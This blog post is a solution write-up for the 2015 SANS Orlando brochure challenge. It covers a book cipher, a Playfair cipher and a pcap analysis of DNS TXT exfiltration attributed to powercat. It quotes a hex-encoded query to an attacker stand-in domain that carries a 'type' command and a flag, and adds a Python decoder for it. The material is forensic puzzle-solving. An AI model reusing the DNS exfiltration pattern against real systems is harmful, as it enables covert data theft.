Tuesday, April 21, 2015

2015 Orlando Brochure Challenge Solution

SANS 2015 Orlando Brochure Challenge Solution

I had to wait until the deadline passed in order to submit my write-up of this challenge.  The last entry date to be eligible for a prize was 4/20/2015.

The first part of the challenge was simple.  It was three numbers separated by commas.  For example, 6,1,2.  These numbers corresponded to the page, paragraph, and word, respectively.  The answer was:  The password to the next part is pyWars.  Be be to “play fair”.  The flag for this part was pyWars.

“Play fair” was the hint to the next challenge.  I had never heard of a “Playfair” cipher until I used Google to find out what kind of cipher the next part of the challenge could be.  I decoded the cipher using an online tool, called the Braingle Playfair Decoder, that omitted q’s and deciphered the Playfair cipher for me.  The key was pyWars, which was given in the first part of the challenge.  I noticed that I had to remove the x’s.  Once deciphered, it was http://wwxw.sans.org/event/sans-twothousandandfifteen/brochure-challenge-nineninefivecazeroethreedefourninecczeroedthrexefivebfiveeightdfiveeninedax, or http://www.sans.org/event/sans-2015/brochure-challenge-995ca0e3de49cc0ed35b58d5e9da.  The flag for this part was SeeYouInOrlando2015.

The last part was a little more challenging.  I had to analyze a pcap and extract a flag from it.  The hint was given that the creator was suspicious that powercat.ps1 was used to extract the flag from the computer that the creator of the challenge was using.  Looking at the pcap, I noted that it was all DNS traffic and that the query types were TXT.  I’m not familiar with powercat, so I looked up the documentation about it.  Then for good measure, I looked up TXT queries to see what they are.  I noted that the response answers were text, so I tried in vain to decode them with a hex to text decoder from http://www.asciitohex.com.  Then I realized that I was looking at the wrong part.  I needed to know what the attacker was asking.  So, I tried to decode the hex of the queries into ASCII format.  That didn't work.  I noted that Wireshark had "TXT String" under the type of DNS query, so I found a hex to string decoder, on http://www.string-functions.com, and sure enough, the first record that I looked at said, “cmd.exe”.  It wasn’t long before I found a record, packet 103, that had this query:

6a040137d56005e844747970652062726f63687572655f666c61672e7478.740a464c41473d42726f63687572655377616e4d69636b65790d0a433a5c.62726f63687572653e.c2.xattackers-domain.com

It decoded to “type brochure_flag.tx?”.  Then it showed a jumble of weird characters.  Obviously, there was some reason that I wasn’t getting the correct flag after that command.  I took the hex on that query apart, cutting out the part where the flag should be typed.  I suspected that I could use the periods in the query as a delimiter.  So, I took out the middle part of the query:

740a464c41473d42726f63687572655377616e4d69636b65790d0a433a5c

I used the converter on this part alone, and I got the last flag which was BrochureSwanMickey.
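The manual decoding above can be scripted for an investigation: the hex-encoded labels of the query name are decoded in order and joined, which reconstructs text that the sender split across label boundaries (here, "tx" at the end of one label and "t" at the start of the next). This is an added example, not code from the original post or from powercat; it assumes only the packet 103 query name quoted above and treats any leading label made of hex pairs as payload and the remaining labels as the carrier domain.

```python
import binascii
import re
from typing import List, Optional, Tuple

# Query name from packet 103 of the challenge pcap, as quoted in the write-up.
QUERY = ("6a040137d56005e844747970652062726f63687572655f666c61672e7478."
         "740a464c41473d42726f63687572655377616e4d69636b65790d0a433a5c."
         "62726f63687572653e.c2.xattackers-domain.com")

# A label is treated as payload when it consists only of whole hex byte pairs.
HEX_LABEL = re.compile(r"^(?:[0-9a-fA-F]{2})+$")


def split_query(qname: str) -> Tuple[List[str], str]:
    """Return (leading hex payload labels, carrier domain made of the rest).

    Assumption: payload labels come first and the first non-hex label starts
    the carrier domain. A carrier domain whose own labels happen to be valid
    hex (e.g. "cafe.example.com") would need an explicit suffix allow-list.
    """
    labels = qname.rstrip(".").split(".")
    for i, label in enumerate(labels):
        if not HEX_LABEL.match(label):
            return labels[:i], ".".join(labels[i:])
    return labels, ""


def decode_payload(labels: List[str]) -> bytes:
    """Concatenate the decoded labels; words may straddle label boundaries."""
    return b"".join(binascii.unhexlify(label) for label in labels)


def printable(data: bytes) -> str:
    """Render decoded bytes for an analyst, escaping non-printable bytes."""
    return "".join(chr(b) if 32 <= b < 127 or b in (10, 13) else f"\\x{b:02x}"
                   for b in data)


def extract_flag(qname: str) -> Optional[str]:
    """Decode the query name and pull out the FLAG=... value, if present."""
    labels, _carrier = split_query(qname)
    text = decode_payload(labels).decode("latin-1")
    match = re.search(r"FLAG=([A-Za-z0-9]+)", text)
    return match.group(1) if match else None


if __name__ == "__main__":
    payload, carrier = split_query(QUERY)
    print("carrier domain:", carrier)
    print(printable(decode_payload(payload)))
    print("flag:", extract_flag(QUERY))
```

Running the same functions over every query name in the capture, rather than one packet, reassembles the whole exfiltrated command session in order.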